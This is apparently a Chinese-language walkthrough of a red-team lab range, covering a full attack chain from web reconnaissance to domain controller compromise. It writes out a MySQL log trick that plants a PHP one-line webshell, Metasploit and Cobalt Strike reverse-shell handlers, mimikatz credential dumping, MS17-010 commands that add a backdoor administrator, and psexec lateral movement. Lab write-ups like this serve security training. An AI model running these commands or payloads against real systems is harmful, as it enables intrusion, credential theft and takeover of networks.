type
status
date
slug
summary
tags
category
icon
password
 

靶场搭建

notion image
初始密码均为:hongrisec@2019
修改后密码:
win7:hongrisec@2024
win2003:hongrisec@2024
win2008:hongrisec@2024
打开虚拟机后,只有win7可上网,其他两台不可,另外还需准备一台kali攻击机
主机
IP
win7
192.168.52.143(内网)/192.168.6.139(外网)
win2003
192.168.52.141(内网)
win2008
192.168.52.138(内网)

Web打点

主机探测
netdiscover -r 192.168.6.0/24 -i eth0
notion image
然而ping的时候ping不通,可能开启了防火墙
notion image
nmap -sS -sV -Pn 192.168.6.139 扫描
notion image
开了80 135 3306端口
80端口-存在http网站
3306端口-存在mysql数据库
访问网页,有php探针
notion image
服务器信息
notion image
php信息
notion image
还有数据库连接测试
notion image
用dirsearch扫描目录,扫除phpinfo.php(php探针也有打印信息)、phpMyadmin
notion image
notion image
看一下phpinfo.php(留个心眼)
notion image
既然有口子,试试mysql弱口令(root/root)
测试连接成功
notion image
前面dirsearch又扫到了phpMyadmin,且网页状态码200,大概率是在管理数据库的,进去看一看(root/root)
notion image
notion image
查看数据库是否有导入权限,看能否直接导入木马
SHOW GLOBAL VARIABLES LIKE '%secure%’
notion image
secure_file_priv 没有导入权限
查看是否有开启日志记录
SHOW GLOBAL VARIABLES LIKE '%general%’
notion image
日志记录功能关闭,但是可以开启
SET GLOBAL general_log = ON
notion image
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'
notion image
SHOW GLOBAL VARIABLES LIKE '%general%’
notion image
整一个木马
select '<?php eval ($_POST[hack]);?>’
notion image
执行这条语句之后,日志会将select后的查询语句记录进日志,从而让日志变成一个一句话木马
可以访问test.php了
notion image
蚁剑连接
notion image
还有个yxcms站点
notion image
上cs马
之后上传文件至win7
notion image
(当然,此处文件名太明显了哈)
终端执行,运行文件
上线
notion image
执行 sleep 0
进行信息收集(蚁剑shell也可
shell whoami
notion image
shell systeminfo查看系统信息,有4个补丁,尝试提权
notion image
notion image
提权成功
notion image
 

内网渗透

内网信息收集
抓取密码,得hash(没明文呐
notion image
Ladon读取本机密码同理:(密码仍没有明文
shell ipconfig/all
发现还有一个网段 192.168.52.0/24
shell systeminfo查看是否存在域
notion image
好好好
PS:
查看网关IP、DNS ip地址、域名、本机是否和DNS服务器处于同一网段等信息
notion image
notion image
minikatz抓取明文密码,get
notion image
和msf联动
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 本机ip
exploit 执行
之后
msf生成payload
把生成的文件用蚁剑传上去,并执行,msf可以看到新建了一个会话
notion image
notion image
notion image
为了使除了msf的其它工具也能通过cs反弹过来的会话进入内网,msf建立需要建立socks反向代理
(正向代理就是指内网机器如果不能直接连到外网,建立正向代理可以连到外网,
而反向代理则相反,是外网主机想要进入内网建立的代理)
首先新建路由
run post/multi/manage/autoroute
查看路由
run autoroute -p
notion image
挂起会话
background
挂起socket
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 127.0.0.1
exploit
notion image
挂起了一个job
notion image
修改proxychains4.conf
vim /etc/proxychains4.conf
notion image
arp 探测内网存活主机
use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1
exploit
notion image
udp协议发现内网存活主机
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.168.52.0/24
exploit
notion image
总结共发现内网三台主机
  1. 168.52.138
192.168.52.141
192.168.52.143
进入会话,查看域信息
back
sessions -l
sessions -i 会话id
shell
net view
notion image
查看主域信息
net view /domain
notion image
接下来横向渗透控制其他主机
进行内网其他主机端口扫描
修改proxychains4配置文件
vim /etc/proxychains4.conf
notion image
proxychains nmap -sS -sV -Pn 192.168.52.138
notion image
proxychains nmap -sS -sV -Pn 192.168.52.141
notion image
开发了445端口,试试看永恒之蓝(MS17_010)
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.52.141
exploit
notion image
有存在这个漏洞,但获取shell失败
换一个模块
notion image
只支持64位,不支持32位
再换,成功了
notion image
尝试添加用户
set COMMAND "net user hack 123@abc /add /y”
run
notion image
查看是否添加成功
notion image
把添加的用户加入管理员组
set COMMAND "net localgroup administrators”
run
notion image
ok
尝试开启telnet服务,打开23端口
set COMMAND sc config tlntsvr start= auto
set COMMAND net start telnet
run
notion image
查看端口是否开放成功
set COMMAND netstat -ano
run
notion image
之后telnet连接
use auxiliary/scanner/telnet/telnet_login set RHOSTS 192.168.52.141 set USERNAME hack set PASSWORD 123@abc run
查看会话
notion image
只会重复输出打印命令
background 挂起
141先做到这里
接下来138
开放了80端口,访问后只是iis的初始页面
notion image
扫一下目录,并没有发现有用的,有一个跳转后404
notion image
同样开放了445端口,试试永恒之蓝
use auxiliary/admin/smb/ms17_010_command set COMMAND net user set RHOST 192.168.52.138 exploit
notion image
同样试试添加用户,并把用户加入管理员组
set COMMAND net user hack 123@abc /add run set COMMAND net localgroup administrators hack /add run
notion image
开启telnet服务
set COMMAND sc config tlntsvr start= auto exploit set COMMAND net start telnet run
notion image
查看端口
set COMMAND netstat -ano
run
并没有开启端口
notion image
分析:
win2008默认没有安装telnet服务
上cs
139先提权
notion image
用hashdump抓取凭据
notion image
之后用mimikatz抓取域内密码
notion image
可以看到抓取的域控密码
notion image
横向移动
接下来用psexec登录OWA所在域(net view时打印的)
创建beacon smb(以win7为跳板机,所以需要SMB监听
notion image
派生一个新的SMB会话
notion image
使用派生的SMB会话作为跳板机,运行psexec模块横向登录到其他主机
notion image
选中138,填写此前创建的账户信息(会话选中system权限的)
notion image
连接成功
notion image
进入beacon
notion image
ok,拿下域控主机
141也可以这样连接
notion image
notion image
 
 
 
 
 
非域间横向移动实战_WPADJWT 学习笔记(二)